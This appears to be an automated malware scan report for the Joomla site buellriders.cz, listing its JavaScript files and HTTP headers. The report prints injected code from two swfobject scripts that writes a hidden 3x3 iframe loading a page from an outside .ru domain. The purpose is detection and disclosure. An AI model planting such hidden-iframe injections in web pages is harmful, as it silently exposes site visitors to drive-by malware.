Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=buellriders.cz
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://buellriders.cz/ | 200 OK Content-Length: 19461 Content-Type: text/html | clean |
http://buellriders.cz/plugins/system/jceutilities/js/mediaobject.js | 200 OK Content-Length: 3866 Content-Type: application/javascript | clean |
http://buellriders.cz/plugins/system/jceutilities/js/jquery-126.js | 200 OK Content-Length: 31034 Content-Type: application/javascript | clean |
http://buellriders.cz/plugins/system/jceutilities/js/jceutilities-217.js | 404 Not Found Content-Length: 1806 Content-Type: text/html | clean |
http://buellriders.cz/test404page.js | 404 Not Found Content-Length: 1806 Content-Type: text/html | clean |
http://buellriders.cz/media/system/js/caption.js | 200 OK Content-Length: 1962 Content-Type: application/javascript | clean |
http://buellriders.cz/plugins/system/jcemediabox/js/jcemediabox.js?version=114 | 200 OK Content-Length: 54889 Content-Type: application/javascript | clean |
http://buellriders.cz/plugins/system/pc_includes/ajax_1.3.js | 200 OK Content-Length: 8843 Content-Type: application/javascript | clean |
http://buellriders.cz/templates/aluma_photography/js/lytebox.js | 200 OK Content-Length: 32768 Content-Type: application/javascript | clean |
http://buellriders.cz/modules/mod_jsn_imageshow_pro/jsn_imageshow_pro/swfobject.js | 200 OK Content-Length: 7043 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1
Antivirus reports:
Hidden iFrame found. size: 3x3 src: http://ipopshonkytonk.ru/naturalaccessmostly.cgi?8
<iframe src="http://ipopshonkytonk.ru/naturalaccessmostly.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3">
http://buellriders.cz/modules/mod_jsn_imageshow_pro/jsn_imageshow_pro/swfobject_addon.js | 200 OK Content-Length: 1003 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
function jsnAddEvent(target, event, func){ if (target.addEventListener){ target.addEventListener(event, func, false); return true; } else if (target.attachEvent){ var result = target.attachEvent("on"+event, func); return result; } else { return false; } } function registerSWFObject(so, container) { isSafari = navigator.userAgent.toLowerCase().indexOf('safari') != -1, isAX = typeof window.ActiveXObject != "undefine function writeSWFObject() { so.write(container); document.getElementById(container).style.visibility="visible"; } document.getElementById(container).style.visibility="hidden"; jsnAddEvent(window, "load", writeSWFObject); } else { so.write(container); } };document.write('<iframe src="http://ipopshonkytonk.ru/naturalaccessmostly.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>');
Antivirus reports:
Hidden iFrame found. size: 3x3 src: http://ipopshonkytonk.ru/naturalaccessmostly.cgi?8
<iframe src="http://ipopshonkytonk.ru/naturalaccessmostly.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3">
http://buellriders.cz/templates/aluma_photography/js/s5_textmenu.js | 200 OK Content-Length: 1435 Content-Type: application/javascript | clean |
http://buellriders.cz/templates/aluma_photography/js/s5_effects.js | 200 OK Content-Length: 4667 Content-Type: application/javascript | clean |
http://buellriders.cz/templates/aluma_photography/js/s5_fading_no_moo_menu.js | 200 OK Content-Length: 58749 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: buellriders.cz
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Wed, 17 Dec 2014 16:33:08 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 17 Dec 2014 16:33:08 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 77e2a04d2aa41957aa6ad3cbff16a556=i27fbj78ekq3d7rl1j03bvjeq3; path=/
X-Powered-By: PHP/5.4.33-1~dotdeb.0
Second query (visit from search engine):
GET / HTTP/1.1
Host: buellriders.cz
Referer: http://www.google.com/search?q=buellriders.cz
Result:
The result is similar to the first query. There are no suspicious redirects found.